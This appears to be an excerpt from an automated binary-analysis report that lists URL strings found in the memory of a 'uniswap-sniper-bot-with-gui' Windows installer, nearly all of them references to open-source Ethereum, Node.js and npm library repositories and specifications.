Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1999889491.0000000006EB9000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://example.orgExpired
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1999889491.0000000006E20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://gcp.gvt2.com/
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1999889491.0000000006E20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://gcp.gvt6.com/
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895700933.0000000006120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://geth.ethereum.org/docs/rpc/pubsub
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895487723.0000000005C20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://gist.github.com/pascaldekloe/62546103a1576803dade9269ccf76330
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895700933.0000000006120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://git.io/debug_fd)
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895700933.0000000006120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/ChainSafe/web3.js
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895700933.0000000006120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/ChainSafe/web3.js/blob/8783f4d64e424456bdc53b34ef1142d0a7cee4d7/packages/web3-eth
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895700933.0000000006120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Jam3/xhr-request
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895487723.0000000005C20000.00000004.00001000.00020000.00000000.sdmp, uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895276586.0000000005720000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/LiosK/UUID.js
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895487723.0000000005C20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Microsoft/TypeScript/issues/2536
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895487723.0000000005C20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Microsoft/TypeScript/pull/29317
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895700933.0000000006120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Raynos/xtend
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895700933.0000000006120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/STRML/async-limiter
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1999889491.0000000006EB9000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/WebBluetoothCG/web-bluetooth/blob/main/implementation-status.md
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895700933.0000000006120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/babel/babel/issues/13109
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895700933.0000000006120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/babel/babel/issues/13109)
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895487723.0000000005C20000.00000004.00001000.00020000.00000000.sdmp, uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895276586.0000000005720000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/blueimp/JavaScript-MD5
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895700933.0000000006120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/colinhacks/zod.git
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895487723.0000000005C20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/conventional-changelog/standard-version):
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895487723.0000000005C20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/cubedro
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895487723.0000000005C20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/debris
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895487723.0000000005C20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/dominictarr/json-buffer
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895487723.0000000005C20000.00000004.00001000.00020000.00000000.sdmp, uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895276586.0000000005720000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/emn178/js-sha3
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895487723.0000000005C20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/ensdomains/ui/blob/3e62e440b53466eeec9dd1c63d73924eefbd88c1/src/utils/contents.js
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895700933.0000000006120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/ethereum/EIPs/blob/master/EIPS/eip-1102.md
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895700933.0000000006120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/ethereum/EIPs/blob/master/EIPS/eip-1186.md
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895700933.0000000006120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/ethereum/EIPs/blob/master/EIPS/eip-1193.md
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895700933.0000000006120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/ethereum/EIPs/blob/master/EIPS/eip-1193.md#connectivity
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895700933.0000000006120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/ethereum/EIPs/blob/master/EIPS/eip-1193.md#events
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895700933.0000000006120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/ethereum/EIPs/blob/master/EIPS/eip-1193.md#provider-errors
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895700933.0000000006120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/ethereum/EIPs/blob/master/EIPS/eip-1193.md#request
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895700933.0000000006120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/ethereum/EIPs/blob/master/EIPS/eip-1474.md
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895700933.0000000006120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/ethereum/EIPs/blob/master/EIPS/eip-695.md
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895700933.0000000006120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/ethereum/EIPs/blob/master/EIPS/eip-712.md
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895700933.0000000006120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/ethereum/execution-apis
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895700933.0000000006120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/ethereum/execution-apis/blob/main/src/eth/block.yaml
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895700933.0000000006120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/ethereum/execution-apis/blob/main/src/eth/client.yaml
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895700933.0000000006120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/ethereum/execution-apis/blob/main/src/eth/execute.yaml
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895700933.0000000006120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/ethereum/execution-apis/blob/main/src/eth/fee_market.yaml
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895700933.0000000006120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/ethereum/execution-apis/blob/main/src/eth/fee_market.yaml#L42
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895700933.0000000006120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/ethereum/execution-apis/blob/main/src/eth/filter.yaml
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895700933.0000000006120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/ethereum/execution-apis/blob/main/src/eth/mining.yaml
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895700933.0000000006120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/ethereum/execution-apis/blob/main/src/eth/sign.yaml
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895700933.0000000006120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/ethereum/execution-apis/blob/main/src/eth/state.yaml
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895700933.0000000006120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/ethereum/execution-apis/blob/main/src/eth/submit.yaml
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895700933.0000000006120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/ethereum/execution-apis/blob/main/src/eth/transaction.yaml
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895700933.0000000006120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/ethereum/execution-apis/blob/main/src/schemas/block.yaml#L2
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895700933.0000000006120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/ethereum/execution-apis/blob/main/src/schemas/client.yaml#L2
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895700933.0000000006120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/ethereum/execution-apis/blob/main/src/schemas/filter.json#L28
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895700933.0000000006120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/ethereum/execution-apis/blob/main/src/schemas/filter.json#L59
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895700933.0000000006120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/ethereum/execution-apis/blob/main/src/schemas/filter.yaml#L2
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895700933.0000000006120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/ethereum/execution-apis/blob/main/src/schemas/receipt.yaml#L2
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895700933.0000000006120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/ethereum/execution-apis/blob/main/src/schemas/receipt.yaml#L36
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895700933.0000000006120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/ethereum/execution-apis/blob/main/src/schemas/transaction.yaml#L144
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895700933.0000000006120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/ethereum/execution-apis/blob/main/src/schemas/transaction.yaml#L211
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895700933.0000000006120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/ethereum/execution-apis/blob/main/src/schemas/transaction.yaml#L216
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895700933.0000000006120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/ethereum/execution-apis/blob/main/src/schemas/transaction.yaml#L244
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895700933.0000000006120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/ethereum/execution-apis/pull/201
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895487723.0000000005C20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/ethereum/web3.js
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895487723.0000000005C20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/ethereum/web3.js/issues/3520)
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895487723.0000000005C20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/ethereum/web3.js/tree/1.x/packages/web3-bzz
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895487723.0000000005C20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/ethereum/web3.js/tree/1.x/packages/web3-core
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895487723.0000000005C20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/ethereum/web3.js/tree/1.x/packages/web3-core-helpers
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895487723.0000000005C20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/ethereum/web3.js/tree/1.x/packages/web3-core-method
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895487723.0000000005C20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/ethereum/web3.js/tree/1.x/packages/web3-core-promievent
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895487723.0000000005C20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/ethereum/web3.js/tree/1.x/packages/web3-core-requestmanager
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895487723.0000000005C20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/ethereum/web3.js/tree/1.x/packages/web3-core-subscriptions
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895487723.0000000005C20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/ethereum/web3.js/tree/1.x/packages/web3-eth
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895487723.0000000005C20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/ethereum/web3.js/tree/1.x/packages/web3-eth-abi
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895487723.0000000005C20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/ethereum/web3.js/tree/1.x/packages/web3-eth-accounts
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895487723.0000000005C20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/ethereum/web3.js/tree/1.x/packages/web3-eth-contract
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895487723.0000000005C20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/ethereum/web3.js/tree/1.x/packages/web3-eth-ens
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895487723.0000000005C20000.00000004.00001000.00020000.00000000.sdmp, uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895700933.0000000006120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/ethereum/web3.js/tree/1.x/packages/web3-eth-iban
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895700933.0000000006120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/ethereum/web3.js/tree/1.x/packages/web3-eth-personal
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895700933.0000000006120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/ethereum/web3.js/tree/1.x/packages/web3-net
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895700933.0000000006120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/ethereum/web3.js/tree/1.x/packages/web3-providers-http
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895700933.0000000006120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/ethereum/web3.js/tree/1.x/packages/web3-providers-ipc
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895700933.0000000006120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/ethereum/web3.js/tree/1.x/packages/web3-providers-ws
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895700933.0000000006120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/ethereum/web3.js/tree/1.x/packages/web3-shh
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895700933.0000000006120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/ethereum/web3.js/tree/1.x/packages/web3-utils
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895700933.0000000006120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/ethereum/wiki/wiki/Ethereum-Contract-ABI)
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895487723.0000000005C20000.00000004.00001000.00020000.00000000.sdmp, uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895700933.0000000006120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/ethereum/wiki/wiki/ICAP:-Inter-exchange-Client-Address-Protocol
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895487723.0000000005C20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/ethereumjs/ethereumjs-wallet
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895487723.0000000005C20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/ethers-io/ethers.js/blob/2a7ce0e72a1e0c9469e10392b0329e75e341cf18/packages/abstra
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895487723.0000000005C20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/ethers-io/ethers.js/blob/ba6854bdd5a912fe873d5da494cb5c62c190adde/packages/abstra
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895700933.0000000006120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/ethers-io/ethers.js/blob/ce8f1e4015c0f27bf178238770b1325136e3351a/packages/json-w
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895487723.0000000005C20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/facebook/jest/issues/2549
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895700933.0000000006120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/facebook/react-native/pull/1632
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895700933.0000000006120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/fians/Waves/blob/master/LICENSE
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895487723.0000000005C20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/form-data/form-data
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895487723.0000000005C20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/form-data/form-data)
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895700933.0000000006120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/gulpjs/gulp.git#4.0
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895700933.0000000006120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/ibc/yaeti.git
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895487723.0000000005C20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/indutny/bn.js
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895700933.0000000006120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/isaacs/yallist.git
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895487723.0000000005C20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/jaredwray/keyv
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895487723.0000000005C20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/jaredwray/keyv.git
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895700933.0000000006120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/joshstevens19/ethereum-bloom-filters/blob/fbeb47b70b46243c3963fe1c2988d7461ef1723
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895700933.0000000006120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/joyent/node/issues/1726
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895487723.0000000005C20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/maiavictor/eth-lib#readme
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895487723.0000000005C20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/maiavictor/eth-lib.git
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895700933.0000000006120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/maiavictor/xhr-request-promise#readme
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895700933.0000000006120000.00000004.00001000.00020000.00000000.sdmp, uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895276586.0000000005720000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mattdesl
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895700933.0000000006120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/meta-dapp/pcs-sniper-bot
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895700933.0000000006120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/meta-dapp/quickswap-sniper-bot
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895700933.0000000006120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/meta-dapp/uniswap-sniper-bot.git
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895487723.0000000005C20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/microsoft/TypeScript/issues/9568
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895700933.0000000006120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/naugtur/xhr
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895700933.0000000006120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/naugtur/xhr/issues/100.
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895700933.0000000006120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/node-fetch/node-fetch#custom-agent
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895487723.0000000005C20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/nodejs/node/blob/654df09ae0c5e17d1b52a900a545f0664d8c7627/lib/internal/http2/util
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895487723.0000000005C20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/nodejs/node/blob/6eec858f34a40ffa489c1ec54bb24da72a28c781/lib/internal/http2/comp
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895487723.0000000005C20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/nodejs/node/blob/master/lib/internal/errors.js
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895487723.0000000005C20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/nodejs/node/issues/35303
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895487723.0000000005C20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/nodejs/node/issues/38426
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895487723.0000000005C20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/nodejs/node/issues/39356
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895487723.0000000005C20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/nodejs/node/issues/41251
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895700933.0000000006120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/nodejs/node/issues/8871#issuecomment-250915913
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895700933.0000000006120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/nodejs/node/issues/9006
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895700933.0000000006120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/npm/wrappy
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895487723.0000000005C20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/obscuren
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895700933.0000000006120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/paulmillr/noble-hashes/issues/25#issuecomment-1750106284
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895700933.0000000006120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/shtylman/node-cookie
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895487723.0000000005C20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/sindresorhus/got)
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895487723.0000000005C20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/sindresorhus/got/issues/1489
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895487723.0000000005C20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/sindresorhus/got/issues/690
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895487723.0000000005C20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/sindresorhus/got?sponsor=1
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895487723.0000000005C20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/sindresorhus/is-plain-obj/blob/main/index.js
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895487723.0000000005C20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/sindresorhus/is?sponsor=1
